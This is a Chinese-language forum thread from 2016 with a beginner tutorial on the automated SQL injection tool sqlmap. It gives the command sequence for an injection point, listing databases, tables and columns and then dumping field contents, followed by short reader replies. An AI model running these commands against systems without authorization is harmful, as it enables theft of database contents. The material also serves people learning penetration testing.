菜鸟如何使用SQLMAP

安子超 · 发表于 2016-1-10 22:53:56

以下内容可能会对大牛造成恶心、眩晕等不良反应。关闭该页面即可好转

SQLMAP是一个自动注入化工具运行在Python 2.7 环境有具有很强跨平台性、无图形界面

1.
使用快捷方式启动

2.
   现做如下假设
                           1. 已经安装Python2.7 并已经添加了环境变量
                           2. 已经下载了SQLMAP
                           3. 会使用cmd命令行
                                                   我知道你们都是大牛
3.
   打开要在sqlmap的目录里

注入点、绝对不要做坏事我们是白帽黑阔这已经提交补天了

**************************************

sqlmap.py -u "注入点" //会判断数据库类型，服务操作系统、脚本类型前后有双引号

03服务器 / asp.net / ms sql 2008

sqlmap.py -u "注入点" --dbs //列数据库按上键

sqlmap.py -u "注入点" -D 数据库名 --tables //列出表名

sqlmap.py -u "注入点" -D 数据库名 -T 表名 --columns //猜字段

sqlmap.py -u "注入点" -D 数据库名 -T 表名 -C "字段名2,字段名2” --dump //获得字符、段内容

小圈圈 · 发表于 2016-1-11 08:57:47

我不是大牛@_@

haowozao · 发表于 2016-1-11 09:28:08

完全看不懂的说

蓝颜 · 发表于 2016-1-11 14:31:08

哪里恶心头疼了

caizi · 发表于 2016-1-11 17:12:02

不错不错，终于学会了

雨僧 · 发表于 2016-1-12 14:36:44

只是一些非常初级的东西，详细的推荐大家去freebuf

Mrlin · 发表于 2016-1-13 12:23:53

提示: 作者被禁止或删除内容自动屏蔽

飘零 · 发表于 2016-2-12 10:28:47

觉得很好呢

Mrlin Mrlin 当前离线积分 374 头像被屏蔽	发表于 2016-1-13 12:23:53 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
Mrlin Mrlin 当前离线积分 374 头像被屏蔽
	回复支持反对使用道具举报

菜鸟如何使用SQLMAP

评分

相关帖子

浏览过的版块

指导单位

旗下站点

联系我们